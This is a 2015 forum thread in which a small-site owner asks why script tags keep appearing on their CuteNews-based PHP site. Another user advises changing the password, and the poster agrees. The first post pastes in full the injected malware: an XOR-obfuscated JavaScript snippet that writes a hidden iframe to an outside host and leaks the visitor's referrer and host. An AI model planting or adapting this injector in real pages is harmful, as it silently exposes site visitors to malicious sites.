xtl Posted August 8, 2015 Share Posted August 8, 2015 so some time ago (maybe two weeks) on my website strange &--#60;script&--#62;s started to appear. i can't understand how it's done but it redirects users to suspicious sites.i've done some digging on that matter, found out it could be an xss attack. some people recommended using htmlpurifier, so i included it onto my files. yet it seems it didn't stop the attacks at all, literally 10 minutes ago i had to manually remove &--#60;script&--#62; again.the script thingy contained this: &--#60;br&--#62;<script type="text/javascript">var a="'1Aqapkrv'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00tl6,'00'02)'02'00p,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(B)/&--#62;/&--#62;;document.write(c);</script>&--#60;br&--#62; (by the way, i see here &--#60;script&--#62; is filtered nicely, maybe I installed htmlpurifier wrong? my code below) <?php require_once '/home/virfaith/public_html/htmlpurifier/library/HTMLPurifier.auto.php'; $config = HTMLPurifier_Config::createDefault(); $purifier = new HTMLPurifier($config); $clean_html = $purifier->purify($dirty_html); ?> my webpage consists of two .php files (index and one about author), cutenews folder (news system using text files instead of mysql) and htmlpurifier. my site is mostly made out of simple html, it's .php just because I wanted to include cutenews into it.could anyone help me? it's the first time I deal with stuff like that. Quote Link to comment Share on other sites More sharing options...
Byron Posted August 9, 2015 Share Posted August 9, 2015 Change your password. 1 Quote Link to comment Share on other sites More sharing options...
xtl Posted August 9, 2015 Author Share Posted August 9, 2015 well, seems obvious. i feel dumb now, sometimes i just kind of forget about this kind of stuff... thanks! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.